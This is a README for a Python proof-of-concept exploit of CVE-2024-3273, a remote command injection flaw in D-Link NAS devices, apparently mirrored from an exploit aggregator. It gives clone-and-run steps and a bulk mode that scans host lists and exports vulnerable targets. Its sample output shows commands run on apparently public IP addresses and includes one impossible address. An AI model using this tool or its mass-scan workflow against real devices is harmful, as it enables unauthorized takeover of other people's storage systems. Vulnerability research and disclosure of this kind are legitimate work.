Share
## https://sploitus.com/exploit?id=28504CB2-A520-5031-BEFD-56B997437166
# CVE-2024-3273 Proof of Concept (PoC)

This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices. The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.

## Description

CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the `cgi-bin/nas_sharing.cgi` endpoint.

This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.

## Requirements

- Python 3.x
- `requests` library

## Usage

1. Clone this repository:

    ```bash
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    ```

2. Navigate to the repository directory:

    ```bash
    cd CVE-2024-3273
    ```

3. Run the PoC:

    ```bash
    python main.py
    ```

4. Follow the on-screen instructions to choose the target device:
   
   - **Option 1: Single Host (1)**: Enter details for a single target device, including the host IP address and command to run.
   - **Option 2: Multiple Hosts (2)**: Provide a file containing multiple target devices in the format `host:port`, and choose whether to export vulnerable hosts to `vulnerables.txt`.

## Example

```
โ”โ”“โ”“โ”โ”โ”“  โ”โ”“โ”โ”“โ”โ”“โ”โ”“  โ”โ”“โ”โ”“โ”โ”“โ”โ”“
โ”ƒ โ”ƒโ”ƒโ”ฃ โ”โ”โ”โ”›โ”ƒโ”ซโ”โ”›โ”ƒโ”ƒโ”โ” โ”ซโ”โ”› โ”ƒ โ”ซ
โ”—โ”›โ”—โ”›โ”—โ”›  โ”—โ”โ”—โ”›โ”—โ”โ”—โ•‹  โ”—โ”›โ”—โ” โ•นโ”—โ”›

Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi

โ”โ”“โ”“โ”โ”โ”“  โ”โ”“โ”โ”“โ”โ”“โ”โ”“  โ”โ”“โ”โ”“โ”โ”“โ”โ”“
โ”ƒ โ”ƒโ”ƒโ”ฃ โ”โ”โ”โ”›โ”ƒโ”ซโ”โ”›โ”ƒโ”ƒโ”โ” โ”ซโ”โ”› โ”ƒ โ”ซ
โ”—โ”›โ”—โ”›โ”—โ”›  โ”—โ”โ”—โ”›โ”—โ”โ”—โ•‹  โ”—โ”›โ”—โ” โ•นโ”—โ”›

Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
```

## Disclaimer

This PoC is for educational and research purposes only. Use it responsibly and only on devices you are authorized to test.

## Contributing

Contributions are welcome! If you find any issues or improvements, feel free to open an issue or create a pull request.